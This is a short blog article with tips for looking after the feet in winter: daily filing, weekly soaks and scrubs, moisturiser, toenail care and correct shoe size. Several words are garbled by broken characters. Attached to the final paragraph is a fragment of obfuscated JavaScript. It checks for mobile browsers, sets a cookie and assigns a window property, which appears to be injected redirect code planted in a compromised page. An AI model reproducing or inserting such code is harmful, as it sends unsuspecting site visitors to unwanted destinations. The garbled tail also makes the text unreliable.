How To Take Care Of Your Feet In Winter

In winter you have to start taking special care of your skin and your hair. The skin on your hands and feet gets really dry in colder months and needs to be moisturized and exfoliated daily. Here are several tips and tricks on how to take care of your feet in winter so in spring when you start wearing open shoes you can easily show off your well-kept skin!

You have to remove dead skin from your feet daily. Use feet file to do it, but be gently because you can easily bruise your skin. Use the file on dry skin and the gently rinse if to remove whatas left on your feet.

Once a week, give your feet a special bath. Soak them I warm water, add salts or essential oils and leave them there for about 30-40 minutes. This way, you will relax after a long day at work, your feet will feel better after wearing shoes for so much time and the skin will become softer and easier to exfoliate and file afterwards.

Use a gentle scrub after the bath to remove any dead skin and make your skin softer fresh. Exfoliation has to be done weekly a if you do it every day, you may bruise your skin and feel pain while walking.

Use moisturizer daily and pay special attention to dry areas. If you use exfoliator, a foot file and moisturizer, I assure you, your feet will stay smooth all winter!

When taking care of your feet, you shouldnat forget your toenails. If you canat do your pedicure alone, go to a professional to shape, clean and polish your toenails. You need to keep your toenails short and shaped and paint them if you like in a more neutral and versatile color a that way, when you change the color on your fingernails, you wonat have to change to color on your toenails.

The last thing you can make if you want to take care of your feet if to be sure you are wearing the correct shoe size. If your shoes are smaller, they will create blisters and damage your toes. And when shoes are bigger you can easily trip and fall, so be sure you choose the size thatas made for your feet! m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
